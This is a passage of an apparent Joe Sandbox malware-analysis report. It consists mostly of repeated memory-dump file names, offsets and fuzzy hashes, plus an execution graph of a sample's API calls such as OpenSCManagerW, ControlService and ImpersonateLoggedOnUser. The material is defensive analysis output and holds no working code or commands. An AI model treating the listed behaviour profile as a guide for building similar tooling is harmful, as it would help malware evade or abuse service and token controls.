                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 996e930009698c476e6b6c6cca20d4fead177b0186c9e933017a0b2e9d6ec92b
                                                                                                      • Instruction ID: d90507dd7282082f2df9370217f2f67d70ea09eae9ee64f0cb038df7b550ee19
                                                                                                      • Opcode Fuzzy Hash: 996e930009698c476e6b6c6cca20d4fead177b0186c9e933017a0b2e9d6ec92b
                                                                                                      • Instruction Fuzzy Hash: FA513732118FC08BC3359A38889526ABFD1AB57224F898F6CC0EBC77D3D628E005C712
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5babc140677a5fdfd88b56a8881671b14f555b25ed539e06c80d6b511c3b7c6f
                                                                                                      • Instruction ID: 0b64239a6c25d70306a9c29dabd620bfeda53c0a47d92f466f7abfcbe38f7d17
                                                                                                      • Opcode Fuzzy Hash: 5babc140677a5fdfd88b56a8881671b14f555b25ed539e06c80d6b511c3b7c6f
                                                                                                      • Instruction Fuzzy Hash: A7414F63A105250BE7780A349CA43B97A42FB81324F0D937EE9EE8B3D9D764CD44A251
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 15f8be4cfda83a68d979c22e3681a77fd66da72acc9e8627ac9a3af9a2096db1
                                                                                                      • Instruction ID: 43964bba0a9c6161c6bf4ec3c8230a382ae6cf18e0a9c1bd460ff93907b03a4d
                                                                                                      • Opcode Fuzzy Hash: 15f8be4cfda83a68d979c22e3681a77fd66da72acc9e8627ac9a3af9a2096db1
                                                                                                      • Instruction Fuzzy Hash: F3419AF3F212164BF7984879CC583A26683D7E9324F2F42388B59977C5E97E9C0A1348
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ef01acc8d76d285d00aef0a919411171877994b1326c08946d36bdc28aa31566
                                                                                                      • Instruction ID: 017770fe429d2a9320c7eed34d4bd441428c09e132538a8a5179addca21d2b11
                                                                                                      • Opcode Fuzzy Hash: ef01acc8d76d285d00aef0a919411171877994b1326c08946d36bdc28aa31566
                                                                                                      • Instruction Fuzzy Hash: 13110437B38A620BE3A0CE66DCD45166B52FBD5315B1E4235EA89C720AE623F821D190

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:4%
                                                                                                      Dynamic/Decrypted Code Coverage:39.1%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:23
                                                                                                      Total number of Limit Nodes:1
                                                                                                      execution_graph 4309 4e11510 4310 4e11558 ControlService 4309->4310 4311 4e1158f 4310->4311 4295 55e756 VirtualAlloc 4296 55e768 4295->4296 4297 55e8d1 4298 55ef95 VirtualAlloc 4297->4298 4300 6e1c48 LoadLibraryA 4301 6e1c52 4300->4301 4312 6e56b8 4313 6e56bf 4312->4313 4315 6e5648 4312->4315 4314 6e56c1 CreateFileA 4313->4314 4316 6e56d2 4313->4316 4314->4316 4302 4e10d48 4303 4e10d93 OpenSCManagerW 4302->4303 4305 4e10ddc 4303->4305 4306 4e11308 4307 4e11349 ImpersonateLoggedOnUser 4306->4307 4308 4e11376 4307->4308 4317 55b7ce 4318 55b7d3 4317->4318 4319 55b93e LdrInitializeThunk 4318->4319

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 6e568c-6e56cc CreateFileA 5 6e5974-6e599d call 6e599f 0->5 6 6e56d2-6e56f7 0->6 15 6e595f-6e596e 5->15 16 6e599f 5->16 9 6e56fd-6e5715 6->9 10 6e5716-6e5792 call 6e5724 6->10 9->10 30 6e57af-6e57cb call 6e57ce 10->30 31 6e5798 10->31 15->5 18 6e59a5 16->18 19 6e59b1-6e5a7d 16->19 18->19 21 6e59ab 18->21 44 6e5a85-6e5a95 call 6e5a98 19->44 45 6e5a83 19->45 21->19 31->30 33 6e579e 31->33 33->30 45->44
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1867405325.00000000006DE000.00000040.00000001.01000000.00000006.sdmp, Offset: 00550000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1867112879.0000000000550000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867159031.0000000000552000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867201417.0000000000556000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867236553.000000000055A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867257167.0000000000566000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867360840.00000000006C6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867381845.00000000006C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867405325.00000000006EB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867446329.00000000006F4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867464589.00000000006F5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867486438.0000000000700000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867505787.0000000000701000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867524536.0000000000703000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867542975.0000000000705000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867565576.000000000071C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867587385.000000000072C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867612422.000000000072D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867684627.0000000000732000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867711046.000000000073E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867739547.000000000073F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867770872.0000000000740000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867800335.0000000000743000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867835392.000000000075A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867860121.000000000075C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867885280.0000000000764000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867915071.0000000000767000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867939902.0000000000768000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867965258.0000000000771000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867987003.0000000000772000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868010334.0000000000774000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868040491.0000000000785000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868139707.000000000078B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868163174.0000000000793000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868192164.0000000000796000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868279016.000000000079E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868310474.00000000007A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868391241.00000000007AD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868416122.00000000007AE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868439900.00000000007AF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868494689.00000000007B2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868522293.00000000007B3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868545785.00000000007B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868613859.00000000007FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868613859.0000000000803000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868694958.0000000000812000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868715019.0000000000814000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_550000_94JSCZGRDUWCLDEBY2HC1S58YAX1.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID: "Hhu$C
                                                                                                      • API String ID: 823142352-565220045
                                                                                                      • Opcode ID: af55145480f72ef881f4c213ba87dd1d5848e27c8f4a171f82cbb44928500496
                                                                                                      • Instruction ID: 24de5f652b4efdb9bd378b6ecfb1f2e090f394a739fd62a883889135dfda409a
                                                                                                      • Opcode Fuzzy Hash: af55145480f72ef881f4c213ba87dd1d5848e27c8f4a171f82cbb44928500496
                                                                                                      • Instruction Fuzzy Hash: 994149B724EBD0BEE6018A5A6E90AFF3B6FD7C6338B308526F403C6043D2940D0A5234

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
